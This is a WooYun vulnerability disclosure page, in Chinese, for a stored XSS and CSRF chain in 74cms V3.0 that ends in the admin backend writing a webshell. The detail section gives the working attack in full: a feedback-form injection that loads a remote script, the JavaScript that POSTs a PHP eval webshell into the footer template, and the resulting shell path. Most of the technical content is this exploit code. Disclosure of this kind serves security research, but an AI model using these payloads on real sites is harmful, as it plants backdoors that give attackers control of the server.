当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(3) 关注此漏洞

缺陷编号: WooYun-2011-03071

漏洞标题: 骑士CMS(74cms) CSRF 后台 getshell

相关厂商: 骑士CMS(74cms)

漏洞作者: 路人甲

提交时间: 2011-10-21 19:16

公开时间: 2011-10-21 20:27

漏洞类型: CSRF

危害等级: 高

自评Rank: 10

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 模板文件操作参数未过滤 后台xss

1人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-10-21: 积极联系厂商并且等待厂商认领中,细节不对外公开
2011-10-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

官方网站:http://**.**.**.**/

影响版本:74cms V3.0.20110908

Author:insight

漏洞详细:

注册用户-->会员中心-->意见建议-->提交意见内容 1">1<script src="http://**.**.**.**/x.js"></script>1 --> 等待管理员登录

管理员登录-->查看 "待回复的意见/建议" --> .....



js内容:





var Shelldata='tpl_content=%3C%3Fphp%20eval%28%24_POST%5Bxdxd%5D%29%3F%3E&tpl_dir=default&tpl_name=footer.php&del_Submit=%B1%A3%B4%E6'; try{ var xml = window.XMLHttpRequest ? (new XMLHttpRequest()) : (new ActiveXObject('Microsoft.XMLHTTP')); xml.open("POST",'admin_templates.php?act=do_edit',false); xml.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xml.onreadystatechange = function(){if(xml.readyState == 4){}}; xml.send(Shelldata); }catch(e){}





shell地址:http://**.**.**.**/74cmsv3/templates/default/footer.php

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2012-07-11 12:37 | 网络骑士 ( 实习白帽子 | Rank:43 漏洞数:4 | 低调是最NB的炫耀!高调是要被打的征兆!)
    0

    看标题吓我一跳……

登录后才能发表评论,请先 登录